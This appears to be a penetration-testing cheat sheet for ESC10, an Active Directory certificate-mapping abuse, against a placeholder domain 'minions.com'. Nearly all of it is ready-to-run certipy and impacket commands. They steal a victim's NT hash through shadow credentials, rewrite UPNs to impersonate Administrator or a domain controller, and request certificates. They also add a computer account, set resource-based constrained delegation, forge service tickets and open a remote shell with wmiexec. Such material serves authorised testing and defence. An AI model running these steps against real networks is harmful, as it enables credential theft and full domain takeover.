Skip to main content

ESC10

Case 1

Reviewing registry keys as Administrator

bob$ python3 reg.py minions.com/'Administrator':'<pass>'@<IP_address> query -keyName 'HKLM\SYSTEM\CurrentControlSet\Services\Kdc'

If we get StrongCertificateBindingEnforcement REG_DWORD 0x0 we can proceed.

Retrieve the victim's NT Hash

bob$ certipy shadow auto -u <user> -p <pass> -account <victim>

Change user2 UPN to Administrator

bob$ certipy account update -u <user> -p <pass> -user <victim> -upn administrator@minions.com

Request certificate

bob$ certipy req -u <user> -hashes <hash> -ca <ca_name> -template <template_name>

we change back the UPN of <victim> to be sure that only Administrator matches the certificate.

Revert changes of <victim> (to be sure that only Administrator matches the certificate)

bob$ certipy account update -u <user> -p <pass> -user <victim> -upn <victim>@minions.com

Authenticate as the Administrator

bob$ certipy auth -pfx administrator.pfx -domain minions.com

Case 2

Using reg.py to query registry from Linux

bob$ python3 reg.py minions.com/Administrator:'<pass>'@<IP_address> query -keyName 'HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL'

Update account to mach DC machine name

bob$ certipy account update -u '<user>' -p '<pass>' -user <victim> -upn '<dc_machine_name>$@minions.com'

Request a certificate as <victim> to get the domain controller certificate

bob$ certipy req -u <victim>@minions.com -hashes <hash_value> -ca <ca_name> -template <template_name>

Revert changes of <victim> (to be sure that only Administrator matches the certificate)

bob$ certipy account update -u '<user>' -p '<pass>' -user <victim> -upn '<victim>$@minions.com'

Creating a new computer account

bob$ certipy auth -pfx <dc_machine_name>.pfx -domain minions.com -dc-ip <dc_ip_address> -ldap-shell
# add_computer <new_account_name> <new_account_pass>
# set_rbcd <dc_machine_name>$ <new_account_name>$

Abusing RBCD to Impersonate the Administrator

bob$ impacket-getST -spn cifs/<dc_machine_name>$@minions.com -impersonate Administrator -dc-ip <dc_ip_address> minions.com/'<new_account_name>$':<new_account_pass>

Connect using the Administrator TGT

bob$ export KRB5CCNAME=Administrator.ccache
bob$ impacket-wmiexec -k -no-pass <dc_machine_name>.minions.com